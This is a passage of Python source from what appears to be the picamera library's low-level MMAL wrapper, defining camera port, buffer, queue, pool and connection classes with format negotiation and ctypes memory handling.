                except PiCameraPortDisabled:
                    # The port was disabled, no point trying again
                    pass
        # Workaround: There is a bug in the MJPEG encoder that causes a
        # deadlock if the FIFO is full on shutdown. Increasing the encoder
        # buffer size makes this less likely to happen. See
        # raspberrypi/userland#208. Connecting the encoder component resets the
        # output port's buffer size, hence why we correct this here, just
        # before enabling the port.
        if self._port[0].format[0].encoding == mmal.MMAL_ENCODING_MJPEG:
            self._port[0].buffer_size = max(512 * 1024, self._port[0].buffer_size_recommended)
        if callback:
            assert self._stopped
            assert self._pool is None
            self._stopped = False
            self._pool = MMALPortPool(self)
            try:
                self._wrapper = mmal.MMAL_PORT_BH_CB_T(wrapper)
                mmal_check(
                    mmal.mmal_port_enable(self._port, self._wrapper),
                    prefix="Unable to enable port %s" % self.name)
                # If this port is an output port, send it all the buffers
                # in the pool. If it's an input port, don't bother: the user
                # will presumably want to feed buffers to it manually
                if self._port[0].type == mmal.MMAL_PORT_TYPE_OUTPUT:
                    self._pool.send_all_buffers(block=False)
            except:
                # Roll back to the disabled state on any failure
                self._pool.close()
                self._pool = None
                self._stopped = True
                raise
        else:
            super(MMALPort, self).enable()
    def disable(self):
        """
        Disable the port.
        """
        self._stopped = True
        super(MMALPort, self).disable()
        if self._pool is not None:
            self._pool.close()
            self._pool = None
    @property
    def connection(self):
        """
        If this port is connected to another, this property holds the
        :class:`MMALConnection` or :class:`MMALPythonConnection` object which
        represents that connection. If this port is not connected, this
        property is ``None``.
        """
        return self._connection
    def connect(self, other, **options):
        """
        Connect this port to the *other* :class:`MMALPort` (or
        :class:`MMALPythonPort`). The type and configuration of the connection
        will be automatically selected.
        Various connection *options* can be specified as keyword arguments.
        These will be passed onto the :class:`MMALConnection` or
        :class:`MMALPythonConnection` constructor that is called (see those
        classes for an explanation of the available options).
        """
        # Always construct connections from the output end
        if self.type != mmal.MMAL_PORT_TYPE_OUTPUT:
            return other.connect(self, **options)
        if other.type != mmal.MMAL_PORT_TYPE_INPUT:
            raise PiCameraValueError(
                'A connection can only be established between an output and '
                'an input port')
        if isinstance(other, MMALPythonPort):
            return MMALPythonConnection(self, other, **options)
        else:
            return MMALConnection(self, other, **options)
    def disconnect(self):
        """
        Destroy the connection between this port and another port.
        """
        if self.connection is not None:
            self.connection.close()
class MMALVideoPort(MMALPort):
    """
    Represents an MMAL port used to pass video data.
    """
    __slots__ = ()
    def __repr__(self):
        # Guard clause: closed ports have no format information to report
        if self._port is None:
            return '<MMALVideoPort closed>'
        return (
            '<MMALVideoPort "%s": format=MMAL_FOURCC("%s") buffers=%dx%d '
            'frames=%s@%sfps colorspace=MMAL_FOURCC("%s")>' % (
                self.name, mmal.FOURCC_str(self.format),
                self._port[0].buffer_num, self._port[0].buffer_size,
                self.framesize, self.framerate,
                mmal.FOURCC_str(self.colorspace)))
    def _get_framesize(self):
        # The crop rectangle holds the *visible* frame size; width/height on
        # the video struct hold the block-aligned buffer dimensions
        crop = self._port[0].format[0].es[0].video.crop
        return PiResolution(crop.width, crop.height)
    def _set_framesize(self, value):
        res = to_resolution(value)
        video_fmt = self._port[0].format[0].es[0].video
        # Buffer dimensions are rounded up to the camera's 32x16 block size;
        # the crop rectangle records the size actually requested
        video_fmt.width = bcm_host.VCOS_ALIGN_UP(res.width, 32)
        video_fmt.height = bcm_host.VCOS_ALIGN_UP(res.height, 16)
        video_fmt.crop.width = res.width
        video_fmt.crop.height = res.height
    framesize = property(_get_framesize, _set_framesize, doc="""\
        Retrieves or sets the size of the port's video frames as a (width,
        height) tuple. This attribute implicitly handles scaling the given
        size up to the block size of the camera (32x16).
        After setting this attribute, call :meth:`~MMALPort.commit` to make the
        changes effective.
        """)
    def _get_framerate(self):
        rate = self._port[0].format[0].es[0].video.frame_rate
        try:
            return Fraction(rate.num, rate.den)
        except ZeroDivisionError:
            # A zero denominator only ever accompanies a zero numerator
            # (meaning "unknown / variable"); report it as 0fps
            assert rate.num == 0
            return Fraction(0, 1)
    def _set_framerate(self, value):
        rate = to_fraction(value)
        video_fmt = self._port[0].format[0].es[0].video
        video_fmt.frame_rate.num = rate.numerator
        video_fmt.frame_rate.den = rate.denominator
    framerate = property(_get_framerate, _set_framerate, doc="""\
        Retrieves or sets the framerate of the port's video frames in fps.
        After setting this attribute, call :meth:`~MMALPort.commit` to make the
        changes effective.
        """)
    def _get_colorspace(self):
        return self._port[0].format[0].es[0].video.color_space
    def _set_colorspace(self, value):
        self._port[0].format[0].es[0].video.color_space = value
    colorspace = property(_get_colorspace, _set_colorspace, doc="""\
        Retrieves or sets the color-space of the port's frames.
        After setting this attribute, call :meth:`~MMALPort.commit` to make the
        changes effective.
        """)
class MMALAudioPort(MMALPort):
    """
    Represents an MMAL port used to pass audio data.
    """
    __slots__ = ()
    def __repr__(self):
        # Guard clause: closed ports have no format information to report
        if self._port is None:
            return '<MMALAudioPort closed>'
        return '<MMALAudioPort "%s": format=MMAL_FOURCC(%r) buffers=%dx%d>' % (
            self.name, mmal.FOURCC_str(self.format),
            self._port[0].buffer_num, self._port[0].buffer_size)
class MMALSubPicturePort(MMALPort):
    """
    Represents an MMAL port used to pass sub-picture (caption) data.
    """
    __slots__ = ()
    def __repr__(self):
        # Guard clause: closed ports have no format information to report
        if self._port is None:
            return '<MMALSubPicturePort closed>'
        return '<MMALSubPicturePort "%s": format=MMAL_FOURCC(%r) buffers=%dx%d>' % (
            self.name, mmal.FOURCC_str(self.format),
            self._port[0].buffer_num, self._port[0].buffer_size)
class MMALPortParams(object):
    """
    Represents the parameters of an MMAL port. This class implements the
    :attr:`MMALControlPort.params` attribute.
    Internally, the class understands how to convert certain structures to more
    common Python data-types. For example, parameters that expect an
    MMAL_RATIONAL_T type will return and accept Python's
    :class:`~fractions.Fraction` class (or any other numeric types), while
    parameters that expect an MMAL_BOOL_T type will treat anything as a truthy
    value. Parameters that expect the MMAL_PARAMETER_STRING_T structure will be
    treated as plain strings, and likewise MMAL_PARAMETER_INT32_T and similar
    structures will be treated as plain ints.
    Parameters that expect more complex structures will return and expect
    those structures verbatim.
    """
    __slots__ = ('_port',)
    def __init__(self, port):
        # port is a ctypes pointer to the underlying MMAL_PORT_T structure
        super(MMALPortParams, self).__init__()
        self._port = port
    def __getitem__(self, key):
        # key is an MMAL parameter id; PARAM_TYPES maps it to the ctypes
        # structure the firmware expects for that parameter
        dtype = PARAM_TYPES[key]
        # Use the short-cut functions where possible (teeny bit faster if we
        # get some C to do the structure wrapping for us)
        func = {
            mmal.MMAL_PARAMETER_RATIONAL_T: mmal.mmal_port_parameter_get_rational,
            mmal.MMAL_PARAMETER_BOOLEAN_T: mmal.mmal_port_parameter_get_boolean,
            mmal.MMAL_PARAMETER_INT32_T: mmal.mmal_port_parameter_get_int32,
            mmal.MMAL_PARAMETER_INT64_T: mmal.mmal_port_parameter_get_int64,
            mmal.MMAL_PARAMETER_UINT32_T: mmal.mmal_port_parameter_get_uint32,
            mmal.MMAL_PARAMETER_UINT64_T: mmal.mmal_port_parameter_get_uint64,
        }.get(dtype, mmal.mmal_port_parameter_get)
        # conv converts the raw ctypes result into a friendly Python value;
        # complex structures pass through unchanged
        conv = {
            mmal.MMAL_PARAMETER_RATIONAL_T: lambda v: Fraction(v.num, v.den),
            mmal.MMAL_PARAMETER_BOOLEAN_T: lambda v: v.value != mmal.MMAL_FALSE,
            mmal.MMAL_PARAMETER_INT32_T: lambda v: v.value,
            mmal.MMAL_PARAMETER_INT64_T: lambda v: v.value,
            mmal.MMAL_PARAMETER_UINT32_T: lambda v: v.value,
            mmal.MMAL_PARAMETER_UINT64_T: lambda v: v.value,
            mmal.MMAL_PARAMETER_STRING_T: lambda v: v.str.decode('ascii'),
        }.get(dtype, lambda v: v)
        if func == mmal.mmal_port_parameter_get:
            # Generic path: allocate the full parameter structure with an
            # initialized header and let MMAL fill it in
            result = dtype(
                mmal.MMAL_PARAMETER_HEADER_T(key, ct.sizeof(dtype))
                )
            mmal_check(
                func(self._port, result.hdr),
                prefix="Failed to get parameter %d" % key)
        else:
            # Short-cut path: the C helpers take a bare scalar/rational, so
            # re-bind dtype to the matching plain ctypes type
            dtype = {
                mmal.MMAL_PARAMETER_RATIONAL_T: mmal.MMAL_RATIONAL_T,
                mmal.MMAL_PARAMETER_BOOLEAN_T: mmal.MMAL_BOOL_T,
                mmal.MMAL_PARAMETER_INT32_T: ct.c_int32,
                mmal.MMAL_PARAMETER_INT64_T: ct.c_int64,
                mmal.MMAL_PARAMETER_UINT32_T: ct.c_uint32,
                mmal.MMAL_PARAMETER_UINT64_T: ct.c_uint64,
                }[dtype]
            result = dtype()
            mmal_check(
                func(self._port, key, result),
                prefix="Failed to get parameter %d" % key)
        return conv(result)
    def __setitem__(self, key, value):
        dtype = PARAM_TYPES[key]
        # Prefer the C short-cut setters where one exists for the type
        func = {
            mmal.MMAL_PARAMETER_RATIONAL_T: mmal.mmal_port_parameter_set_rational,
            mmal.MMAL_PARAMETER_BOOLEAN_T: mmal.mmal_port_parameter_set_boolean,
            mmal.MMAL_PARAMETER_INT32_T: mmal.mmal_port_parameter_set_int32,
            mmal.MMAL_PARAMETER_INT64_T: mmal.mmal_port_parameter_set_int64,
            mmal.MMAL_PARAMETER_UINT32_T: mmal.mmal_port_parameter_set_uint32,
            mmal.MMAL_PARAMETER_UINT64_T: mmal.mmal_port_parameter_set_uint64,
            mmal.MMAL_PARAMETER_STRING_T: mmal.mmal_port_parameter_set_string,
        }.get(dtype, mmal.mmal_port_parameter_set)
        # conv translates friendly Python values into what the setter expects
        conv = {
            mmal.MMAL_PARAMETER_RATIONAL_T: lambda v: to_rational(v),
            mmal.MMAL_PARAMETER_BOOLEAN_T: lambda v: mmal.MMAL_TRUE if v else mmal.MMAL_FALSE,
            mmal.MMAL_PARAMETER_STRING_T: lambda v: v.encode('ascii'),
        }.get(dtype, lambda v: v)
        if func == mmal.mmal_port_parameter_set:
            # Generic path: caller supplies the full structure; verify the
            # header matches the parameter being set
            mp = conv(value)
            assert mp.hdr.id == key
            assert mp.hdr.size >= ct.sizeof(dtype)
            mmal_check(
                func(self._port, mp.hdr),
                prefix="Failed to set parameter %d to %r" % (key, value))
        else:
            mmal_check(
                func(self._port, key, conv(value)),
                prefix="Failed to set parameter %d to %r" % (key, value))
class MMALBuffer(object):
    """
    Represents an MMAL buffer header. This is usually constructed from the
    buffer header pointer and is largely supplied to make working with
    the buffer's data a bit simpler. Using the buffer as a context manager
    implicitly locks the buffer's memory and returns the :mod:`ctypes`
    buffer object itself::

        def callback(port, buf):
            with buf as data:
                # data is a ctypes uint8 array with size entries
                print(len(data))

    Alternatively you can use the :attr:`data` property directly, which returns
    and modifies the buffer's data as a :class:`bytes` object (note this is
    generally slower than using the buffer object unless you are simply
    replacing the entire buffer)::

        def callback(port, buf):
            # the buffer contents as a byte-string
            print(buf.data)
    """
    __slots__ = ('_buf',)

    def __init__(self, buf):
        # buf is a ctypes pointer to the underlying MMAL buffer header;
        # all accessors below dereference it via self._buf[0]
        super(MMALBuffer, self).__init__()
        self._buf = buf

    def _get_command(self):
        return self._buf[0].cmd
    def _set_command(self, value):
        self._buf[0].cmd = value
    command = property(_get_command, _set_command, doc="""\
        The command set in the buffer's meta-data. This is usually 0 for
        buffers returned by an encoder; typically this is only used by buffers
        sent to the callback of a control port.
        """)

    def _get_flags(self):
        return self._buf[0].flags
    def _set_flags(self, value):
        self._buf[0].flags = value
    flags = property(_get_flags, _set_flags, doc="""\
        The flags set in the buffer's meta-data, returned as a bitmapped
        integer. Typical flags include:

        * ``MMAL_BUFFER_HEADER_FLAG_EOS`` -- end of stream
        * ``MMAL_BUFFER_HEADER_FLAG_FRAME_START`` -- start of frame data
        * ``MMAL_BUFFER_HEADER_FLAG_FRAME_END`` -- end of frame data
        * ``MMAL_BUFFER_HEADER_FLAG_KEYFRAME`` -- frame is a key-frame
        * ``MMAL_BUFFER_HEADER_FLAG_FRAME`` -- frame data
        * ``MMAL_BUFFER_HEADER_FLAG_CODECSIDEINFO`` -- motion estimation data
        """)

    def _get_pts(self):
        return self._buf[0].pts
    def _set_pts(self, value):
        self._buf[0].pts = value
    pts = property(_get_pts, _set_pts, doc="""\
        The presentation timestamp (PTS) of the buffer, as an integer number
        of microseconds or ``MMAL_TIME_UNKNOWN``.
        """)

    def _get_dts(self):
        return self._buf[0].dts
    def _set_dts(self, value):
        self._buf[0].dts = value
    dts = property(_get_dts, _set_dts, doc="""\
        The decoding timestamp (DTS) of the buffer, as an integer number of
        microseconds or ``MMAL_TIME_UNKNOWN``.
        """)

    @property
    def size(self):
        """
        Returns the length of the buffer's data area in bytes. This will be
        greater than or equal to :attr:`length` and is fixed in value.
        """
        return self._buf[0].alloc_size

    def _get_offset(self):
        return self._buf[0].offset
    def _set_offset(self, value):
        assert 0 <= value <= self.size
        self._buf[0].offset = value
        # Clamp length so offset + length never exceeds the allocated size
        self.length = min(self.size - self.offset, self.length)
    offset = property(_get_offset, _set_offset, doc="""\
        The offset from the start of the buffer at which the data actually
        begins. Defaults to 0. If this is set to a value which would force the
        current :attr:`length` off the end of the buffer's :attr:`size`, then
        :attr:`length` will be decreased automatically.
        """)

    def _get_length(self):
        return self._buf[0].length
    def _set_length(self, value):
        assert 0 <= value <= self.size - self.offset
        self._buf[0].length = value
    length = property(_get_length, _set_length, doc="""\
        The length of data held in the buffer. Must be less than or equal to
        the allocated size of data held in :attr:`size` minus the data
        :attr:`offset`. This attribute can be used to effectively blank the
        buffer by setting it to zero.
        """)

    def _get_data(self):
        # Lock the buffer memory for the duration of the copy; string_at
        # copies length bytes starting at the current offset
        with self as buf:
            return ct.string_at(
                ct.byref(buf, self._buf[0].offset),
                self._buf[0].length)
    def _set_data(self, value):
        # buffer_bytes is a module-level helper (defined elsewhere in this
        # file); presumably it returns the byte-length of any object
        # supporting the buffer protocol -- TODO confirm
        value_len = buffer_bytes(value)
        if value_len:
            if value_len > self.size:
                raise PiCameraValueError(
                    'data is too large for buffer (%d > %d)' % (
                        value_len, self.size))
            bp = ct.c_uint8 * value_len
            try:
                # Try a zero-copy view of the source first; this fails
                # (TypeError) for read-only sources such as bytes, in which
                # case fall back to copying
                sp = bp.from_buffer(value)
            except TypeError:
                sp = bp.from_buffer_copy(value)
            with self as buf:
                ct.memmove(buf, sp, value_len)
        # Writing (even zero bytes) resets offset and sets length to the
        # number of bytes written, per the property's documented contract
        self._buf[0].offset = 0
        self._buf[0].length = value_len
    data = property(_get_data, _set_data, doc="""\
        The data held in the buffer as a :class:`bytes` string. You can set
        this attribute to modify the data in the buffer. Acceptable values
        are anything that supports the buffer protocol, and which contains
        :attr:`size` bytes or less. Setting this attribute implicitly modifies
        the :attr:`length` attribute to the length of the specified value and
        sets :attr:`offset` to zero.

        .. note::

            Accessing a buffer's data via this attribute is relatively slow
            (as it copies the buffer's data to/from Python objects). See the
            :class:`MMALBuffer` documentation for details of a faster (but
            more complex) method.
        """)

    def replicate(self, source):
        """
        Replicates the *source* :class:`MMALBuffer`. This copies all fields
        from the *source* buffer, including the internal :attr:`data` pointer.
        In other words, after replication this buffer and the *source* buffer
        will share the same block of memory for *data*.

        The *source* buffer will also be referenced internally by this buffer
        and will only be recycled once this buffer is released.

        .. note::

            This is fundamentally different to the operation of the
            :meth:`copy_from` method. It is much faster, but imposes the burden
            that two buffers now share data (the *source* cannot be released
            until the replicant has been released).
        """
        mmal_check(
            mmal.mmal_buffer_header_replicate(self._buf, source._buf),
            prefix='unable to replicate buffer')

    def copy_from(self, source):
        """
        Copies all fields (including data) from the *source*
        :class:`MMALBuffer`. This buffer must have sufficient :attr:`size` to
        store :attr:`length` bytes from the *source* buffer. This method
        implicitly sets :attr:`offset` to zero, and :attr:`length` to the
        number of bytes copied.

        .. note::

            This is fundamentally different to the operation of the
            :meth:`replicate` method. It is much slower, but afterward the
            copied buffer is entirely independent of the *source*.
        """
        assert self.size >= source.length
        source_len = source._buf[0].length
        if source_len:
            # Lock both buffers' memory while copying; honour the source's
            # data offset but write to the start of this buffer
            with self as target_buf, source as source_buf:
                ct.memmove(target_buf, ct.byref(source_buf, source.offset), source_len)
        self._buf[0].offset = 0
        self._buf[0].length = source_len
        self.copy_meta(source)

    def copy_meta(self, source):
        """
        Copy meta-data from the *source* :class:`MMALBuffer`; specifically this
        copies all buffer fields with the exception of :attr:`data`,
        :attr:`length` and :attr:`offset`.
        """
        self._buf[0].cmd = source._buf[0].cmd
        self._buf[0].flags = source._buf[0].flags
        self._buf[0].dts = source._buf[0].dts
        self._buf[0].pts = source._buf[0].pts
        # type is a pointer to the type-specific data union; copy its
        # pointed-to contents rather than the pointer itself
        self._buf[0].type[0] = source._buf[0].type[0]

    def acquire(self):
        """
        Acquire a reference to the buffer. This will prevent the buffer from
        being recycled until :meth:`release` is called. This method can be
        called multiple times in which case an equivalent number of calls
        to :meth:`release` must be made before the buffer will actually be
        released.
        """
        mmal.mmal_buffer_header_acquire(self._buf)

    def release(self):
        """
        Release a reference to the buffer. This is the opposing call to
        :meth:`acquire`. Once all references have been released, the buffer
        will be recycled.
        """
        mmal.mmal_buffer_header_release(self._buf)

    def reset(self):
        """
        Resets all buffer header fields to default values.
        """
        mmal.mmal_buffer_header_reset(self._buf)

    def __enter__(self):
        # Lock the buffer's memory and expose it as a fixed-size ctypes
        # uint8 array covering the whole allocated area
        mmal_check(
            mmal.mmal_buffer_header_mem_lock(self._buf),
            prefix='unable to lock buffer header memory')
        return ct.cast(
            self._buf[0].data,
            ct.POINTER(ct.c_uint8 * self._buf[0].alloc_size)).contents

    def __exit__(self, *exc):
        mmal.mmal_buffer_header_mem_unlock(self._buf)
        # Never suppress exceptions raised inside the with-block
        return False

    def __repr__(self):
        if self._buf is not None:
            # Render the interesting flag bits as a compact fixed-width
            # string (e.g. "S____X") plus the decoded command and length
            return '<MMALBuffer object: flags=%s command=%s length=%d>' % (
                ''.join((
                'S' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_FRAME_START else '_',
                'E' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_FRAME_END else '_',
                'K' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_KEYFRAME else '_',
                'C' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_CONFIG else '_',
                'M' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_CODECSIDEINFO else '_',
                'X' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_EOS else '_',
                )), {
                    0:                                'none',
                    mmal.MMAL_EVENT_ERROR:            'error',
                    mmal.MMAL_EVENT_FORMAT_CHANGED:   'format-change',
                    mmal.MMAL_EVENT_PARAMETER_CHANGED: 'param-change',
                    mmal.MMAL_EVENT_EOS:              'end-of-stream',
                    }[self.command], self.length)
        else:
            return '<MMALBuffer object: ???>'
class MMALQueue(object):
    """
    Represents an MMAL buffer queue. Buffers can be added to the queue with
    the :meth:`put` method, and retrieved from the queue (with optional wait
    timeout) with the :meth:`get` method.
    """
    __slots__ = ('_queue', '_created')

    def __init__(self, queue):
        # _created tracks whether this instance owns the underlying MMAL
        # queue; queues wrapped from a pool are owned (and destroyed) by
        # the pool, so close() must not destroy them
        self._created = False
        self._queue = queue

    @classmethod
    def create(cls):
        """
        Construct a new MMAL queue owned by this instance; :meth:`close`
        will destroy it.
        """
        self = cls(mmal.mmal_queue_create())
        self._created = True
        return self

    def close(self):
        """
        Destroy the queue (if this instance created it) and drop the
        reference to the underlying MMAL queue.
        """
        if self._created:
            # BUG FIX: this previously called the unqualified name
            # mmal_queue_destroy, which raised NameError at runtime; the
            # function lives in the mmal module like every other call here
            mmal.mmal_queue_destroy(self._queue)
        self._queue = None

    def __len__(self):
        return mmal.mmal_queue_length(self._queue)

    def get(self, block=True, timeout=None):
        """
        Get the next buffer from the queue. If *block* is ``True`` (the default)
        and *timeout* is ``None`` (the default) then the method will block
        until a buffer is available. Otherwise *timeout* is the maximum time to
        wait (in seconds) for a buffer to become available. If a buffer is not
        available before the timeout expires, the method returns ``None``.
        Likewise, if *block* is ``False`` and no buffer is immediately
        available then ``None`` is returned.
        """
        if block and timeout is None:
            buf = mmal.mmal_queue_wait(self._queue)
        elif block and timeout is not None:
            # mmal_queue_timedwait expects its timeout in milliseconds
            buf = mmal.mmal_queue_timedwait(self._queue, int(timeout * 1000))
        else:
            buf = mmal.mmal_queue_get(self._queue)
        if buf:
            return MMALBuffer(buf)

    def put(self, buf):
        """
        Place :class:`MMALBuffer` *buf* at the back of the queue.
        """
        mmal.mmal_queue_put(self._queue, buf._buf)

    def put_back(self, buf):
        """
        Place :class:`MMALBuffer` *buf* at the front of the queue. This is
        used when a buffer was removed from the queue but needs to be put
        back at the front where it was originally taken from.
        """
        mmal.mmal_queue_put_back(self._queue, buf._buf)
class MMALPool(object):
    """
    Represents an MMAL pool containing :class:`MMALBuffer` objects. Every
    active port is associated with a pool of buffers and a queue. An
    instance can be indexed like a sequence of :class:`MMALBuffer` objects,
    but that is intended for debugging only; normal use goes through
    :meth:`get_buffer`, :meth:`send_buffer`, and :meth:`send_all_buffers`,
    which operate on the wrapped :class:`MMALQueue`.
    """
    __slots__ = ('_pool', '_queue')

    def __init__(self, pool):
        super(MMALPool, self).__init__()
        self._pool = pool
        # Wrap the pool's own queue; MMALQueue does not take ownership
        self._queue = MMALQueue(pool[0].queue)

    def __len__(self):
        return self._pool[0].headers_num

    def __getitem__(self, index):
        return MMALBuffer(self._pool[0].header[index])

    @property
    def queue(self):
        """
        The :class:`MMALQueue` associated with the pool.
        """
        return self._queue

    def close(self):
        if self._pool is not None:
            mmal.mmal_pool_destroy(self._pool)
            self._pool = None

    def resize(self, new_count, new_size):
        """
        Resizes the pool to contain *new_count* buffers with *new_size* bytes
        allocated to each buffer.

        *new_count* must be 1 or more (you cannot resize a pool to contain
        no headers). However, *new_size* can be 0 which causes all payload
        buffers to be released.

        .. warning::

            If the pool is associated with a port, the port must be disabled
            when resizing the pool.
        """
        mmal_check(
            mmal.mmal_pool_resize(self._pool, new_count, new_size),
            prefix='unable to resize pool')

    def get_buffer(self, block=True, timeout=None):
        """
        Get the next buffer from the pool's queue. See :meth:`MMALQueue.get`
        for the meaning of the parameters.
        """
        return self._queue.get(block, timeout)

    def send_buffer(self, port, block=True, timeout=None):
        """
        Get a buffer from the pool's queue and send it to *port*. *block* and
        *timeout* act as they do in :meth:`get_buffer`. If no buffer is
        available (for the given values of *block* and *timeout*),
        :exc:`~picamera.PiCameraMMALError` is raised.
        """
        next_buf = self.get_buffer(block, timeout)
        if next_buf is None:
            raise PiCameraMMALError(mmal.MMAL_EAGAIN, 'no buffers available')
        port.send_buffer(next_buf)

    def send_all_buffers(self, port, block=True, timeout=None):
        """
        Send all buffers currently in the queue to *port*. *block* and
        *timeout* act as they do in :meth:`get_buffer`. If no buffer is
        available (for the given values of *block* and *timeout*),
        :exc:`~picamera.PiCameraMMALError` is raised.
        """
        # Snapshot the queue length first; sent buffers may be recycled
        # back into the queue while we iterate
        for _ in range(len(self._queue)):
            self.send_buffer(port, block, timeout)
class MMALPortPool(MMALPool):
    """
    Construct an MMAL pool sized according to the buffer count and buffer
    size required by the :class:`MMALPort` *port*.
    """
    __slots__ = ('_port',)

    def __init__(self, port):
        raw_port = port._port
        pool = mmal.mmal_port_pool_create(
            raw_port, raw_port[0].buffer_num, raw_port[0].buffer_size)
        if not pool:
            raise PiCameraMMALError(
                mmal.MMAL_ENOSPC,
                'failed to create buffer header pool for port %s' % port.name)
        super(MMALPortPool, self).__init__(pool)
        self._port = port

    def close(self):
        if self._pool is not None:
            # Port pools must be destroyed via the port-specific call;
            # clear _pool so the base close() won't destroy it again
            mmal.mmal_port_pool_destroy(self._port._port, self._pool)
            self._port = None
            self._pool = None
        super(MMALPortPool, self).close()

    @property
    def port(self):
        return self._port

    def send_buffer(self, port=None, block=True, timeout=None):
        """
        Get a buffer from the pool and send it to *port* (or the port the pool
        is associated with by default). *block* and *timeout* act as they do in
        :meth:`MMALPool.get_buffer`.
        """
        target = self._port if port is None else port
        super(MMALPortPool, self).send_buffer(target, block, timeout)

    def send_all_buffers(self, port=None, block=True, timeout=None):
        """
        Send all buffers from the pool to *port* (or the port the pool is
        associated with by default). *block* and *timeout* act as they do in
        :meth:`MMALPool.get_buffer`.
        """
        target = self._port if port is None else port
        super(MMALPortPool, self).send_all_buffers(target, block, timeout)
class MMALBaseConnection(MMALObject):
    """
    Abstract base class for :class:`MMALConnection` and
    :class:`MMALPythonConnection`. Handles tracking of the source and
    target ports, and format negotiation. All other connection details are
    handled by the descendent classes.
    """
    __slots__ = ('_source', '_target')

    # Descendents override this with their preferred negotiation formats
    default_formats = ()

    # (source, target) pairs of OPAQUE sub-formats that may be connected
    compatible_opaque_formats = {
        ('OPQV-single', 'OPQV-single'),
        ('OPQV-dual',   'OPQV-dual'),
        ('OPQV-strips', 'OPQV-strips'),
        ('OPQV-dual',   'OPQV-single'),
        ('OPQV-single', 'OPQV-dual'), # recent firmwares permit this
        }

    def __init__(
            self, source, target, formats=default_formats):
        super(MMALBaseConnection, self).__init__()
        # Validate the endpoints: source must be an unconnected output
        # port, target an unconnected input port
        if not isinstance(source, (MMALPort, MMALPythonPort)):
            raise PiCameraValueError('source is not a port')
        if not isinstance(target, (MMALPort, MMALPythonPort)):
            raise PiCameraValueError('target is not a port')
        if source.type != mmal.MMAL_PORT_TYPE_OUTPUT:
            raise PiCameraValueError('source is not an output port')
        if target.type != mmal.MMAL_PORT_TYPE_INPUT:
            raise PiCameraValueError('target is not an input port')
        if source.connection is not None:
            raise PiCameraValueError('source port is already connected')
        if target.connection is not None:
            raise PiCameraValueError('target port is already connected')
        if formats is None:
            formats = ()
        self._source = source
        self._target = target
        # Permit a single format to be passed bare instead of in a tuple
        try:
            iter(formats)
        except TypeError:
            formats = (formats,)
        self._negotiate_format(formats)
        # Register this connection on both ports only after successful
        # negotiation
        source._connection = self
        target._connection = self
        # Descendents continue with connection implementation...

    def close(self):
        # De-register from both ports; idempotent
        if self._source is not None:
            self._source._connection = None
        self._source = None
        if self._target is not None:
            self._target._connection = None
        self._target = None

    def _negotiate_format(self, formats):
        # Commit the source format and mirror it onto the target
        def copy_format():
            self._source.commit()
            self._target.copy_from(self._source)
            self._target.commit()

        # Equalize buffer counts/sizes on both ports to the larger value
        def max_buffers():
            self._source.buffer_count = self._target.buffer_count = max(
                self._source.buffer_count, self._target.buffer_count)
            self._source.buffer_size = self._target.buffer_size = max(
                self._source.buffer_size, self._target.buffer_size)

        # Filter out formats that aren't supported on both source and target
        # ports. This is a little tricky as ports that support OPAQUE never
        # claim they do (so we have to assume it's mutually supported)
        mutually_supported = (
            set(self._source.supported_formats) &
            set(self._target.supported_formats)
            ) | {mmal.MMAL_ENCODING_OPAQUE}
        formats = [f for f in formats if f in mutually_supported]

        if formats:
            # If there are any formats left to try, perform the negotiation
            # with the filtered list. Again, there's some special casing to
            # deal with the incompatible OPAQUE sub-formats
            for f in formats:
                if f == mmal.MMAL_ENCODING_OPAQUE:
                    if (self._source.opaque_subformat,
                            self._target.opaque_subformat) in self.compatible_opaque_formats:
                        self._source.format = mmal.MMAL_ENCODING_OPAQUE
                    else:
                        continue
                else:
                    self._source.format = f
                try:
                    copy_format()
                except PiCameraMMALError as e:
                    # MMAL_EINVAL here means "format rejected"; move on to
                    # the next candidate, anything else is a real error
                    if e.status != mmal.MMAL_EINVAL:
                        raise
                    continue
                else:
                    max_buffers()
                    return
            raise PiCameraMMALError(
                mmal.MMAL_EINVAL, 'failed to negotiate port format')
        else:
            # If no formats are available to try (either from filtering or
            # because none were given), assume the source port is set up
            # properly. Just copy the format to the target and hope the caller
            # knows what they're doing
            try:
                copy_format()
            except PiCameraMMALError as e:
                if e.status != mmal.MMAL_EINVAL:
                    raise
                raise PiCameraMMALError(
                    mmal.MMAL_EINVAL, 'failed to copy source format to target port')
            else:
                max_buffers()

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_value, exc_tb):
        self.close()

    @property
    def source(self):
        """
        The source :class:`MMALPort` or :class:`MMALPythonPort` of the
        connection.
        """
        return self._source

    @property
    def target(self):
        """
        The target :class:`MMALPort` or :class:`MMALPythonPort` of the
        connection.
        """
        return self._target
class MMALConnection(MMALBaseConnection):
    """
    Represents an MMAL internal connection between two components. The
    constructor accepts arguments providing the *source* :class:`MMALPort` and
    *target* :class:`MMALPort`.

    The *formats* parameter specifies an iterable of formats (in preference
    order) that the connection may attempt when negotiating formats between
    the two ports. If this is ``None``, or an empty iterable, no negotiation
    will take place and the source port's format will simply be copied to the
    target port. Otherwise, the iterable will be worked through in order until
    a format acceptable to both ports is discovered.

    .. note::

        The default *formats* list starts with OPAQUE; the class understands
        the different OPAQUE sub-formats (see :ref:`mmal` for more information)
        and will only select OPAQUE if compatible sub-formats can be used on
        both ports.

    The *callback* parameter can optionally specify a callable which will be
    executed for each buffer that traverses the connection (providing an
    opportunity to manipulate or drop that buffer). If specified, it must be a
    callable which accepts two parameters: the :class:`MMALConnection` object
    sending the data, and the :class:`MMALBuffer` object containing data. The
    callable may optionally manipulate the :class:`MMALBuffer` and return it
    to permit it to continue traversing the connection, or return ``None``
    in which case the buffer will be released.

    .. note::

        There is a significant performance penalty for specifying a
        callback between MMAL components as it requires buffers to be
        copied from the GPU's memory to the CPU's memory and back again.

    .. data:: default_formats
        :annotation: = (MMAL_ENCODING_OPAQUE, MMAL_ENCODING_I420, MMAL_ENCODING_RGB24, MMAL_ENCODING_BGR24, MMAL_ENCODING_RGBA, MMAL_ENCODING_BGRA)

        Class attribute defining the default formats used to negotiate
        connections between MMAL components.
    """
    __slots__ = ('_connection', '_callback', '_wrapper')

    # Formats tried (in preference order) when the caller specifies none
    default_formats = (
        mmal.MMAL_ENCODING_OPAQUE,
